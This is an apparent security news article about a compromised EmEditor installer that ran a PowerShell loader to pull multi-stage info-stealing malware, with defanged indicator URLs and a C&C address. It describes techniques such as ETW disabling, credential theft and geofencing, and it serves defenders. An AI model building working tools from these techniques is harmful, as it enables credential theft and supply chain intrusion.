Compromised EmEditor Installer Used in Watering Hole Attack Delivers Multi-Stage Info-Stealing Malware
A watering hole attack compromised the EmEditor download page, distributing a malicious installer that deploys multi-stage malware capable of credential theft, data exfiltration, and lateral movement.
In late December 2025, EmEditor, a widely used text editor developed by U.S.-based Emurasoft, issued a security advisory warning users that its download page had been compromised. Attackers had modified the installer to deliver a sophisticated multi-stage malware payload, targeting users who downloaded the software from the official website. The attack, detailed by Trend Micro Research, highlights the growing risk of software supply chain compromises, particularly those targeting developer tools.
The compromised installer, distributed as a modified .MSI file, executes a PowerShell command upon installation that retrieves first-stage code from a URL crafted to appear legitimate (EmEditorjp[.]com). This first-stage payload then connects to two additional URLs to download the main malicious scripts. The malware uses obfuscation techniques including string manipulation methods like Insert, Remove, Replace, Substring, and Trim to evade detection.
The two main payloads serve distinct functions. One payload disables PowerShell Event Tracing for Windows (ETW), steals credentials from the Windows Credential Manager, detects security software installed on the system, performs anti-virtualization checks, and captures screenshots. The other payload handles system fingerprinting, geofencing, command-and-control (C&C) reporting, data exfiltration, and registry checking for security applications.
Based on geofencing behavior that excludes countries including Armenia, Belarus, Georgia, Kazakhstan, and Kyrgyzstan, researchers assess the threat actors are likely of Russian origin or from the Commonwealth of Independent States (CIS). This pattern is commonly observed among groups from this region to reduce legal and operational risk. The malware sends collected information to a C&C server at hxxps://cachingdrive[.]com/gate/init/2daef8cd, with the consistent string "2daef8cd" potentially serving as a campaign identifier.
EmEditor has longstanding recognition within Japanese developer communities as a recommended Windows-based editor, suggesting the attackers may be specifically targeting this user base. The timing of the compromise during the year-end holiday period may have been intentional, as reduced staffing and more relaxed routines can increase the likelihood of security lapses. As of the advisory, several instances of the malicious URL being accessed by EmEditor users have been recorded, indicating some users were likely compromised before the company's announcement.
This incident challenges the assumption that trusted software can be treated as lower priority during security triage. Companies using Windows-based, third-party software distributed through public download channels are exposed to this risk. CISOs should ensure that activities originating from trusted installers and developer tools are consistently monitored. Trend Micro's TrendAI Vision One detects and blocks the indicators of compromise discussed in the research.